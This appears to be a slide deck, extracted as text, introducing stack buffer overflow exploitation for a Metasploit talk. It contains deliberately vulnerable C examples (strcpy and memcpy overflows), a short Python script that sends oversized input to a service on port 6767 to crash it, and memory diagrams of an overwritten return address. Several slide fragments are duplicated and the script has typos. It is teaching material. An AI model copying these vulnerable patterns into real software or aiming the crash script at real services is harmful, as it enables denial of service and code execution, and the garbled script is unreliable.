Metasploit Framework

READY TO ROLL

PRESENTED BY: JASKARAN SINGH

Android 4.1.2 (Linux 3.3) Exploitation

Exploit Writing◦ Windows Assembly Language

◦ Linux Assembly Language

◦ Networking Basics

◦ Socket programming

◦ Python/Ruby/Perl/C/C++/…

Memcpy Buffer Overflow Exploit

ARG2

ARG1

RET

EBP-old

Local variables

High Memory

Low Memory

SP (Stack Pointer)

BP (Base Pointer / Frame Pointer)

Return Address

Arguments

Str (pointer to a string)

Return Address

EBP-old (Previous Base Pointer)

Buffer[0] … Buffer[7]

var_a

(a) (b)

void test(char *str) { char buffer[12];int var_a; strcpy (buffer, str); } int main() {char *str = “Larger than 12 bytes”; test (str); }

Str (pointer to a string)

Return Address

EBP-old (Previous Base Pointer)

Buffer[0] … Buffer[7]

var_a

(a) (b)

void test(char *str) { char buffer[12];int var_a; strcpy (buffer, str); } int main() {char *str = “Larger than 12 bytes”; test (str); }

void test(char *str) { char buffer[12];int var_a; strcpy (buffer, str); } int main() {char *str = “Larger than 12 bytes”; test (str); }

char a[3]

a[0] a[1] a[2]

E X P L O I T

a = “EXPLOIT”

a[0] a[1] a[2]

Overwritten memory locations

Vulnerable Code

//listening on port 6767

int vul_func(char *input)

{

char buffer[256];

memcpy(buffer, input, 1024);

return 1;

}

Vulnerable Code

Exploit Code

Exploit Code#!/usr/bin/python

import socket, syssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sock.connect((sys.arv[1], 6767)) //argument passed is IP address

buffer = “J*2000

sock.send(buffer)

sock.close()

Crash…

Crash…

Debugger

After Attack

Memory…

ARG2

ARG1

RET

EBP-old

Local var1

41414141

41414141

41414141

41414141

41414141

41414141

4141414141414141414141414141414141414141

EIP

Stack

Successful Exploitation

PAYLOAD

PAYLOAD

4A4A4A4A

4A4A4A4A

4A4A4A4A

AABBCC08AABBCC08

AABBCC04

AABBCC00

EIP